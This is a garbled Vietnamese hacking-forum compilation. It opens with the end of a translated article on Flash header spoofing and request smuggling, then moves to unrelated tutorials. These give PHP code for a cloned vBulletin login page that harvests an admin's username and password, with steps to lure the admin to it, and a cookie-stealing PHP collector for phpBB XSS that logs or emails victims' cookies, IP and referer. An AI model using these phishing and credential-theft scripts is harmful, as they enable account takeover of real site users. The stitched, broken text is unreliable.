Cần phải nghiên cứu xa hơn để nắm rõ những cách thực hiện như vậy có đưa đến khả năng khai thác lỗi hay không Các kinh nghiệm đã cho phép Flash 9 giới hạn nhiều hơn những header sẽ dùng
Trang 1Hướng dẫn thêm
================
HTTP Request Splitting ([8]) và HTTP Request Smuggling ([10]) trong IE với Flash 7/8 có thể gữi header Content-Length với bất kì giá trị nào Điều này cho phép thực hiện tấn công HTTP Request Splitting Cũng như thế, việc chèn header Transfer-Encoding, hay thêm một header Content-Length thứ hai sẽ mơ ra cơ hội cho HTTP Request Smuggling Cần phải nghiên cứu xa hơn để nắm rõ những cách thực hiện như vậy có đưa đến khả năng khai thác lỗi hay không
Các kinh nghiệm đã cho phép Flash 9 giới hạn nhiều hơn những header sẽ dùng trong LoadVars.addRequestHeader(), ngôn ngữ ActionScript 3.0 sẽ mạnh hơn là 2.0 Như thế, phiên bản mới này cung cấp những tính năng đáng giá tại mức
HTTP, như là khả năng gửi nhiều loại HTTP, không chĩ GET và POST Tốt hơn nên tìm hiểu Flash 9 và ActionScript 3.0 để nắm rõ những tiềm năng của chúng, lưu ý về các mẹo trong HTTP request
Kết luận
-==========
Việc xác thực dựa trên các header của HTTP request mà trình duyệt gửi đi không phải là ý hay Thực tế thì mọi header có thể bị giả nếu client đang phải chạy một Flash movie xấu, và điều này hoàn toàn đúng với trên 80% máy tính để bàn truy cập Internet Do đó, khả năng tấn công cross-site scripting trên những header như trên, cũng như tấn công bằng các request giả để cross site (cho những site mà tự bảo vệ bằng cách kiểm tra header Referer) là cao hơn so với những gì người ta nhận thấy
Bài viết khuyên nên dùng giải pháp đơn phần cho trường hợp về sau, tuy nhiên giải pháp này phụ thuộc rất nhiều vào Flash, và như thế có thể không cung cấp phần bảo vệ chống đỡ những biến thái được sử dụng với các công nghệ khác, hoặc
những phát triển khác trong Flash Vì thế, với giả mạo request cross site, nên xem xét những giải pháp khác mà không dựa vào Referer
Tham khảo
-=========
[1] "Technology Breakdown" (Adobe website)
Trang 2http://www.adobe.com/products/player_census/flashplayer/tech_breakdown.html
[2] "Macromedia Flash Player Version Penetration" (Adobe website)
http://www.adobe.com/products/player_census/flashplayer/version_penetration.ht
ml
[3] "Re: 'Exploiting the XmlHttpRequest object in IE' - paper by Amit
Klein" by Anonymous, BugTraq posting, September 27th, 2005
http://www.securityfocus.com/archive/1/411823
[4] "Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1" by Thiago
Zaninotti, BugTraq posting, May 8th, 2006
http://www.securityfocus.com/archive/1/433280
[5] "Re: Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1" by
Amit Klein, BugTraq posting, May 18th, 2006
http://www.securityfocus.com/archive/1/434729
[6] "Client Side Trojans", Zope developers mailing list, May 2000
http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan
[7] "Cross Site Request Forgeries" by Peter Watkins, BugTraq posting, June 15th, 2001
http://www.tux.org/~peterw/csrf.txt
[8] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a
lot more " by Amit Klein, BugTraq posting,
September 24th, 2005
http://www.securityfocus.com/archive/1/411585
[9] "Adobe Flash Player 9 Leads a New Generation of Dynamic Media and Rich Internet Applications" (Adobe website), June 28th, 2006
http://www.adobe.com/aboutadobe/pressroom/pressreleases/200606/062806Flash9 html
[10] "HTTP Request Smuggling" by Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 6th, 2005
http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
Trang 3Người dịch: hakuso - Nhóm dịch thuật HVA
Lấy pass admin VBB.Đôi điều cần bàn
Tìm hiểu theo bài viết "Video hacking yahoo"
Trong bài viết video hacking yahoo,có bạn đã rất tài tình (Mà cũng không biết của thằng nèo nữa ) để lấy được username và password của victim thông qua đoạn code sau :
Trích:
<?
$f=fopen("xxxx.html","a");
fwrite($f,"$login@yahoo.com : $passwd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login? o=& intltype
=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs
gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>
Trong đó chú ý đến :
login :lưu tên đăng nhập
passwd:mật khẩu
sau khi đăng nhập victim sẽ được chuyển tới site security login của yahoo để
không nghi ngờ về việc đăng nhập của mình đã được lưu lại
Trích:
location: http://login.yahoo.com/config/login? o=& intltype
=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs
gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=
Từ đó sao chúng ta không xài đến cách lấy pass của admin bằng cách này
Cũng tương tự chúng ta đến trang login của victim để save lại nó:
Chẳng hạn thế này:
http://tuoitreonline.info/forum/newt =newthread&f=2
(chưa đăng nhập)
Nhớ thêm các file trong background cho chuẩn vởi site đó.Up toàn bộ lên hostban
và thay cai html của nó thành dạng như newthread.php2.htm cho giồng 2 bài viết Trong file html của cái này nhở thay :
http://www.tuoitreonline.info/forum/login.php
bằng http://hostban.com/forum/login.php
file login.php của bạn sẽ là`:
Trích:
Trang 4<?
$f=fopen("xxxx.html","a");
fwrite($f,"$vb_login_username : $vb_login_password\n===========\n");
fclose($f);
header("location:
http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554");
?>
Bạn thấy đó chính "vb_login_username" và "vb_login_password" là code lưu lại pass dùng cho login Vbb(mọi phiên bản )
và "xxxx.html" là file trống dùng để lưu lại username và pass
Chu ý rằng :
Trích:
http://www.tuoitreonline.info/forum/ 554#post152554
Đó chính là cái site ma` mình đánh lừa cái thằng admin của trang này
Sau khi reg nick gủi cho admin (dạng tin nhắn ) đoạn sau:
Trích:
http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554Admi
n cho hỏi
Chẳng hiểu thể nào mà cai Quote này nó đọc cả code chep cái này tại đây nhé http://ttvnn.info/forum/lua.html
Với "http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554" la` cái đã lưu ý ở trên còn "http://hostban.com/forum/newthread.php2.htm" là trang
mà bạn lưu site login của nó
Cách dùng [URL= này khả thi hơn cái code "<a href= vò có nhiều site vbb không cho phép html và vBulletin khuyến cáo không nên cho phép html
Thế nhé
Vn_inter(vniss)
Hướng dẫn lấy cookies của phpBB (new bug XSS)
Dạo này HVA đang lên, anh em vnISS có vẻ trầm quá , làm 1 tut chơi
Hướng dẫn lấy cookie của PHPBB
Yêu cầu :
Không đánh cắp bản quyền bài viết
Bài viết mang tính tham khảo và bảo mật, tác giả không chịu mọi trách nhiệm về mặt phá hoại của bài viết này
1 trình browser (e.g : FireFox)
Trang 51 hosting hỗ trợ PHP
Live http headers (chi tiết tại http://livehttpheaders.mozdev.org ) có thể hiểu nôm
na là công cụ giúp ta nhanh chóng fake cookies
Bước 1 :
Sử dụng đoạn code sau
PHP Code:
<?php
$a = $_GET['helpme'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('giupemvoi.txt', 'a');
fwrite($fp,
'Cookie: '.$a.'
Dia chi : ' $ip '
fclose($fp);
?>
<HTML>
<TITLE>Lam sao day anh, giup em </TITLE>
<BODY>
<img scr="link file ảnh để fake admin tập 2">he</img>
</BODY>
</HTML>
Save nó lại thành file giupemdianh.php
creat 1 file giupemvoi.txt chmod về 777
hoặc nếu you muốn send về mail có thể làm như sau :
PHP Code:
<?php
$a = $_GET['helpme'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
mail('dinhcaohack@yahoo.com','XSS in phpBB', $a.' '.$ip.' '.$date.' '.$referer.' ','sit
?>
<HTML>
Trang 6<TITLE>Lam sao day anh, giup em </TITLE>